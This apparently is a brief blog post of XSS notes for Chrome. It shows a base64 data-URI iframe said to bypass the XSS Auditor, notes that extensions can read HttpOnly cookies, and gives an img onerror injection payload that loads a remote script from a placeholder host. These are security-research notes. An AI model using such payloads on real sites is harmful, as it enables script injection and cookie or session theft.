- Choosing Google Chrome as target browser required to bypass XSS Auditor, the integrated Anti-XSS filter. As discovered by Mario Heiderich, the data URI schema with base64 content can be leverage to bypass the filter.
<html>
<body>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
</body>
</html>
- A Chrome extension can override default SOP restrictions and issue cross-domain requests reading the HTTP response, accessing other browser tabs, and also reading every cookie including those marked as HttpOnly.
- JS injection:
<img/src='a'onerror='document.write("<scr","ipt/type=\"text/JavaScript\"/src=\"","http://www.example.com/onetime.js","\"></script>")'>
No comments:
Post a Comment